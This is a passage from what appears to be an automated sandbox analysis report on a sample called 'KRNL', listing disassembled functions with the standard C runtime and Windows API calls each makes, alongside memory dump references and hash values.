                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5351B57260020EAFEB215F65CC81EFF7AABEF44790B15012CFE14D6251EB71EC1196A4
                                                                                                                                                                                                                                                          Function 006EEFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006EF005
                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(006E8E38), ref: 006EF024
                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF052
                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0AD
                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0C4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 66001078-0
                                                                                                                                                                                                                                                          • Opcode ID: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
                                                                                                                                                                                                                                                          • Instruction ID: 3d59a0fc825efad6828327974411dec3a529b87ea031430514ec7b8493255d30
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0416D3160278ADBCB20CF66C4919EAB3B6FF04310B10897AE44687641E770F985CB55
                                                                                                                                                                                                                                                          Function 006ED4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006ED4C9
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006ED4D3
                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 006ED4EA
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 006ED50D
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006ED544
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3716348337-0
                                                                                                                                                                                                                                                          • Opcode ID: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
                                                                                                                                                                                                                                                          • Instruction ID: b4d0c4642763be2541857f7fb966bd011c441fa72e0ed29835dea9242395db61
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A01A1319023959FCB02EBA98945AFD7773AF84724F14411DE415AB3C2DF349E018785
                                                                                                                                                                                                                                                          Function 006EADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006EADDE
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006EADE9
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006EAE57
                                                                                                                                                                                                                                                            • Part of subcall function 006EACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006EACC2
                                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 006EAE04
                                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 006EAE1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                          • Opcode ID: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
                                                                                                                                                                                                                                                          • Instruction ID: bea54adbb77d3ef6881b3b8552a59e70f5b5c58c962d983dcecec3a1bc0db0df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01B1756023909BCB06EFA5D8555BD3762FF84750B15802DE9065B3C1CF78BE42CB8A
                                                                                                                                                                                                                                                          Function 006E1750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                          • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                          • Opcode ID: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
                                                                                                                                                                                                                                                          • Instruction ID: 7310d915460194a38f4f7413e5305a81b8d8e06c819722eb617de05489a6494d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F15D75A012588FCB14CF69C494BADB7F2FF89320F198269E815AF391D734AD41CB90
                                                                                                                                                                                                                                                          Function 006E73E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Concurrency::details::_Release_chore.LIBCPMT ref: 006E7526
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E7561
                                                                                                                                                                                                                                                            • Part of subcall function 006EAF37: CreateThreadpoolWork.KERNEL32(006EB060,006E8A2A,00000000), ref: 006EAF46
                                                                                                                                                                                                                                                            • Part of subcall function 006EAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 006EAF53
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: Fail to schedule the chore!$G.q
                                                                                                                                                                                                                                                          • API String ID: 3683891980-4289182727
                                                                                                                                                                                                                                                          • Opcode ID: 19e44b04ee2f6c8e7d54a61afcb45abe401e4a9a105a96d76cf133c5e5f978ed
                                                                                                                                                                                                                                                          • Instruction ID: c5c31b02e7e76ad7c242f9661e7fc1727bc66479e59dddb65c88342f62da0b48
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e44b04ee2f6c8e7d54a61afcb45abe401e4a9a105a96d76cf133c5e5f978ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07517BB0902348DFCB05DF94D844BAEBBB6FF48314F144129E8196B391E779AA05CB95
                                                                                                                                                                                                                                                          Function 006E3E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3EC6
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E4002
                                                                                                                                                                                                                                                            • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EABE5
                                                                                                                                                                                                                                                            • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EAC09
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                          • String ID: bad locale name$|=ne.q
                                                                                                                                                                                                                                                          • API String ID: 2070049627-3641304814
                                                                                                                                                                                                                                                          • Opcode ID: 269ad90011c9b9ca700257a24275838b3948a0a180b6fc46af21969cfbd89036
                                                                                                                                                                                                                                                          • Instruction ID: c8b075d3f7149adb5063850cb13611cc796dba9b14e580510db145941b615297
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269ad90011c9b9ca700257a24275838b3948a0a180b6fc46af21969cfbd89036
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77418EF0A007559BEB10DF6AC809B57BAF9BF04714F04422CE4099B781E37AE618CBE5
                                                                                                                                                                                                                                                          Function 006EB755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EB809
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                          • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                          • Opcode ID: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
                                                                                                                                                                                                                                                          • Instruction ID: ca7a1570d745cd85b90d7508e7b0b1753db69ce7919babec99c5d67558c50083
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20210331902389DFCF249F56D941ABBB7AEEF54720F24551DE4018BB80DB34AA41CB80
                                                                                                                                                                                                                                                          Function 006EF11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                          • String ID: :%n
                                                                                                                                                                                                                                                          • API String ID: 2551024706-2487494124
                                                                                                                                                                                                                                                          • Opcode ID: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction ID: c27027fd2ae53da7c7fcefa87e2fbe1e7739d6b61703c9a9c0f39f4465083014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F08271655218EFDF108F29DC05ADA3B65EB01B70F248320F821EA2E0E730EE41C690
                                                                                                                                                                                                                                                          Function 006EABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Yarn
                                                                                                                                                                                                                                                          • String ID: e.q$|=ne.q
                                                                                                                                                                                                                                                          • API String ID: 1767336200-1506673154
                                                                                                                                                                                                                                                          • Opcode ID: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction ID: 5652a72172c1655732cdbc06ad4945204099ef7c9978b85cbf39467072c7808a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E065323087046FE74C7A6AAC52BB637DDDF04B60F20002DFA1A865C1ED10BC444569
                                                                                                                                                                                                                                                          Function 00706940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C), ref: 0070694D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C,00000000,?,006FBBBC), ref: 00706957
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0070697F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction ID: 220de2021965a021cd5d3ea174db668cff5f310e282c1e19eeb8475691912a76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE01270390204FADF101FA4EC06FAC3A959B40B91F148564F94CA88E0D779ED609984
                                                                                                                                                                                                                                                          Function 00703F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00704001
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00704253
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00704299
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0070433C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                          • Opcode ID: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction ID: 63b9e8cb4f49cefcc034a0c9f177bb6423c7d55d8751590667e79805d36a2608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D149B5E00258DFCF15CFA8C880AEDBBF5FF49314F14826AEA55EB291D634A941CB50
                                                                                                                                                                                                                                                          Function 006FB295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
